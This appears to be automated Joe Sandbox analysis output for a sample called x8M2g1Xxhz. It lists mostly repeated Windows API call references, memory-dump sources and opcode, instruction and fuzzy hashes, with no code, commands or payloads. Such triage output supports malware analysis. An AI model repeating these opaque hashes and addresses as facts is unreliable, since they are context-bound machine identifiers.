                                                                                                                      • Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 832318072-0
                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: b60e386b98bd7b0fc82f41c8633a0ff849c3469912e7a20d28be5a9d66982957
                                                                                                                      • Instruction ID: 4c935294a99d423f29db8d18c9a4f905b556a48d22cd586af220a1bbff567f32
                                                                                                                      • Opcode Fuzzy Hash: b60e386b98bd7b0fc82f41c8633a0ff849c3469912e7a20d28be5a9d66982957
                                                                                                                      • Instruction Fuzzy Hash: 51718CFB34D221BDB152D4452F64AFB176EE2D6730730883AF807D6942F2992E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: e51af6af403f774400fd47fed7aaa8bd501b5a92db7d4ac9be9befd2449245f7
                                                                                                                      • Instruction ID: b11d7b888e530bb8c76d71530eca66e802edbe281c7bfac2784f30db8b3b7b2d
                                                                                                                      • Opcode Fuzzy Hash: e51af6af403f774400fd47fed7aaa8bd501b5a92db7d4ac9be9befd2449245f7
                                                                                                                      • Instruction Fuzzy Hash: 3C718BFB34D221BDB152D4412F64AFB176EE6D6730730883AF807D6942F2892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 1186f08f600ef3c688541601d340089172c53a311ec78f28815c692d244877d3
                                                                                                                      • Instruction ID: 9a623774519b8c635748d6171d98e134478539837a82ba297f0f0578de367ab4
                                                                                                                      • Opcode Fuzzy Hash: 1186f08f600ef3c688541601d340089172c53a311ec78f28815c692d244877d3
                                                                                                                      • Instruction Fuzzy Hash: 9E718BFB34D221BD7112D4412F64AFB576EE2D6730730883AF807D6942F2882E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 8f1fef081b33c38f74a83e00fec4e516a17dab4ade9f6f4041b000f278384f62
                                                                                                                      • Instruction ID: 7fe4812f89cdaca42903602530788cbe939330a506d292bd694ef16b044d5825
                                                                                                                      • Opcode Fuzzy Hash: 8f1fef081b33c38f74a83e00fec4e516a17dab4ade9f6f4041b000f278384f62
                                                                                                                      • Instruction Fuzzy Hash: 8B7167FB34D221BD7152D0422F64AFB176EE2D6730730883AF807D6942F2892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 3c16b20afc28609291100cbadb0b61c5fa844756564acae581d3b913b17dee0d
                                                                                                                      • Instruction ID: cbcbd245f58ded4ee2cacb6f05be6930314f1617fce5f85229b454742b8393fb
                                                                                                                      • Opcode Fuzzy Hash: 3c16b20afc28609291100cbadb0b61c5fa844756564acae581d3b913b17dee0d
                                                                                                                      • Instruction Fuzzy Hash: B9616AFB34D221BC7152D4462F64AFB176EE2D6730730883AF807D6946F2892E4B2076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: c5e0afd85f7af8371250d560952b8da1aa76d6373be25f4691b6471c765b0a54
                                                                                                                      • Instruction ID: 4ecd6683678d229c32f7bd1c791e644f404dac22c37ebabb8f75778152a9fcc6
                                                                                                                      • Opcode Fuzzy Hash: c5e0afd85f7af8371250d560952b8da1aa76d6373be25f4691b6471c765b0a54
                                                                                                                      • Instruction Fuzzy Hash: 796168FB34D221BDB112D4412F64AFB176EE6D6730330883AF807D6946F2892E4B2076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 0a94017124def620839e15b999502b249d319e47bd19539da18a0fe5f5caadcb
                                                                                                                      • Instruction ID: e10a70e8916ce0b6a1de1e28b362671367c390663d8acbf9a52cee9637c91836
                                                                                                                      • Opcode Fuzzy Hash: 0a94017124def620839e15b999502b249d319e47bd19539da18a0fe5f5caadcb
                                                                                                                      • Instruction Fuzzy Hash: DF6169FB34D221BC7112D0462B64AFB576EE6D6730730883BF807D6946F2892E4B2076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 85b7d8efd9775c2391e0f416a41e8eda221dfdc4e3e4be6c0046af9261f379da
                                                                                                                      • Instruction ID: bdaa386150606b7eed7a2f9325a94b5892cf28475aaf4cc7aa96a4fa08bfaca1
                                                                                                                      • Opcode Fuzzy Hash: 85b7d8efd9775c2391e0f416a41e8eda221dfdc4e3e4be6c0046af9261f379da
                                                                                                                      • Instruction Fuzzy Hash: 346168EB34C221BD7112D0462F64AFB576EE6D6730730883AF807D6946F2892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 48070f374e396048205a581b99c3192262c60ec6cd00aae38f3a53b9ad3a0ff3
                                                                                                                      • Instruction ID: 01dcd7f33162c0919c21d77b7d16128ad0cabd744465673c42002f4c28edd27b
                                                                                                                      • Opcode Fuzzy Hash: 48070f374e396048205a581b99c3192262c60ec6cd00aae38f3a53b9ad3a0ff3
                                                                                                                      • Instruction Fuzzy Hash: AF617BFB34D221BD7152D4416B60AFB276EE6D6730730883BF807D6946F2892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: ae060f3bee209d25ff5158a4328e199fb63da769731f5c94e3faf7ea66be1451
                                                                                                                      • Instruction ID: 5b8023fb20227254946c35dea4add599865b3e76a684fb1ee958fa2b2426f487
                                                                                                                      • Opcode Fuzzy Hash: ae060f3bee209d25ff5158a4328e199fb63da769731f5c94e3faf7ea66be1451
                                                                                                                      • Instruction Fuzzy Hash: 15518EEB34D221BCB152D0412F54AFB276EE6D6730730883AF807D6942F3892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: e2260d3e2884bbbd0fbe8041760401b59b2860f2f3fa48c51b66bb7c99696d61
                                                                                                                      • Instruction ID: 6ce9fb8e13ad8c2c54356a7d8f67bc5cccd4a8b5ea43f4d73f3cb375e5f63bbd
                                                                                                                      • Opcode Fuzzy Hash: e2260d3e2884bbbd0fbe8041760401b59b2860f2f3fa48c51b66bb7c99696d61
                                                                                                                      • Instruction Fuzzy Hash: 0B519DEB34D221BC7152D4452F64AFB176EE2D6730730883AF807D6946F3892E4B6076
                                                                                                                      APIs
                                                                                                                      • Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FirstModule32
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 3757679902-934871106
                                                                                                                      • Opcode ID: 8a49117772fdd797c1fe6516f73e70001e5c45cb203180eab94e045c77e8708c
                                                                                                                      • Instruction ID: 2c8dfc93350560f26b7d5b8c393c21700ba6514a7dd941e8f639d4abf163816b
                                                                                                                      • Opcode Fuzzy Hash: 8a49117772fdd797c1fe6516f73e70001e5c45cb203180eab94e045c77e8708c
                                                                                                                      • Instruction Fuzzy Hash: F151A1F730D221BDB152D4456B60AFB176EE6D6730730883BF807D6946F2892E4B6076
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: aefdcb09bfdbc09ff2cd64af6d0764ae9b2bf7f2c3b0cd564f5bfafa5809c3ac
                                                                                                                      • Instruction ID: 6602db311879cfdfa40b168871a102bba000129f0ac5277a2da458c9a72a15df
                                                                                                                      • Opcode Fuzzy Hash: aefdcb09bfdbc09ff2cd64af6d0764ae9b2bf7f2c3b0cd564f5bfafa5809c3ac
                                                                                                                      • Instruction Fuzzy Hash: 7052C2749113198FDB68EF64E995BDDBBB1FB48301F0081A9E50AA7351DB346E81CF81
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08E569E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 0f636d8764c79dbb2697acf80f92626f469747173359cef0614d7669467287d5
                                                                                                                      • Instruction ID: 8447f885707dcee06f370c6b99979e0610ced70e0c9e069fef640d32e551c8f4
                                                                                                                      • Opcode Fuzzy Hash: 0f636d8764c79dbb2697acf80f92626f469747173359cef0614d7669467287d5
                                                                                                                      • Instruction Fuzzy Hash: 6151E2B1C103499FDB14CFA9C880ADEBFF5BF48310F64822AE819AB210D7749945CF90
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08E569E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 7ba931ebbcc503927936879c81d2f287a3799451349b815a7753e58d78fcd1ac
                                                                                                                      • Instruction ID: 681f317c73068cda72e6cb3007d3b5569980ed018d199b388837dc767317fefd
                                                                                                                      • Opcode Fuzzy Hash: 7ba931ebbcc503927936879c81d2f287a3799451349b815a7753e58d78fcd1ac
                                                                                                                      • Instruction Fuzzy Hash: B241C0B1D103499FDB14CFAAC984ADEBBF5BF48314F64822AE818AB210D7759945CF90
                                                                                                                      APIs
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 08E590E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714655100-0
                                                                                                                      • Opcode ID: 582411748a642ec0e1ec1bee2dab74ac9e305c361c4645664a434fef7a7b5c62
                                                                                                                      • Instruction ID: 35f9e411f455c0b350a7aae3997dc29b3b23085a35aae1b02b76b59e2b1c8b57
                                                                                                                      • Opcode Fuzzy Hash: 582411748a642ec0e1ec1bee2dab74ac9e305c361c4645664a434fef7a7b5c62
                                                                                                                      • Instruction Fuzzy Hash: 604149B5900205CFCB14DF99D888BAAFBF5FB89314F24C859D919AB361D375A841CFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4c97063a484c31d1e2651a0f33d5dd4a81b6eab1d36bd408c8837905b2766c91
                                                                                                                      • Instruction ID: 48b5085a65eaf5cf75537e2a7d78dad858f03c96f1ab1d7c3dea228a299379af
                                                                                                                      • Opcode Fuzzy Hash: 4c97063a484c31d1e2651a0f33d5dd4a81b6eab1d36bd408c8837905b2766c91
                                                                                                                      • Instruction Fuzzy Hash: C6314876900258DFDB01CF99D844ADEBFF6FB88310F14806AEA54A7361C335A954DFA0
                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 085FCA0F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: e57c49bd7831b2ca536d15ba7302f4bca9d5ffda90230119b32de23800f32138
                                                                                                                      • Instruction ID: d7cf2cdb0ed9ade2b9045fb7ef70f5c5acacae77b5f89fe19cc18eeb305755f2
                                                                                                                      • Opcode Fuzzy Hash: e57c49bd7831b2ca536d15ba7302f4bca9d5ffda90230119b32de23800f32138
                                                                                                                      • Instruction Fuzzy Hash: 922136B5D002489FDB10CFA9D884AEEFBF4FB48310F10802AE954A3350C374A944CFA5
                                                                                                                      APIs
                                                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 083098C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a866394d17b0d27a39f93194e90205a97e158dff7575c1c0bb40f998c176ba79
                                                                                                                      • Instruction ID: fe2a4b693b1274bbba475e0bca1fd3ba77663f6d621f5f1b744bd631601332f1
                                                                                                                      • Opcode Fuzzy Hash: a866394d17b0d27a39f93194e90205a97e158dff7575c1c0bb40f998c176ba79
                                                                                                                      • Instruction Fuzzy Hash: 5E116D74E012188FDB04DFACD494BADBBB5BBC8315F548165EC44A7382E731A942CF20
                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 085FCA0F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: d470410cc084910ecfa7825e2fe626d911dda32eb14041210f4abaf4b4738c03
                                                                                                                      • Instruction ID: 84fa99a6fc2cfe3384ab23838d74515dc6d76809627cf3ff1495e3b4a8b95b65
                                                                                                                      • Opcode Fuzzy Hash: d470410cc084910ecfa7825e2fe626d911dda32eb14041210f4abaf4b4738c03
                                                                                                                      • Instruction Fuzzy Hash: 7421E7B5D002589FDB10CFAAD984ADEFBF4FB48310F14842AE954A7350D374A954CFA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401899
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 959018026-0
                                                                                                                      • Opcode ID: 90f9085a524fbb973363f4e02843db0909aa23c81e0a3be8111655e252562ff2
                                                                                                                      • Instruction ID: 9cb55483c9c792efff8d56851843f0bf9cc56964abd505c4856922daeff471a2
                                                                                                                      • Opcode Fuzzy Hash: 90f9085a524fbb973363f4e02843db0909aa23c81e0a3be8111655e252562ff2
                                                                                                                      • Instruction Fuzzy Hash: F7F0A073501322A7E331AA658881B57A6D8DF90B28F14863FE944BB391D3B9D85482DA
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
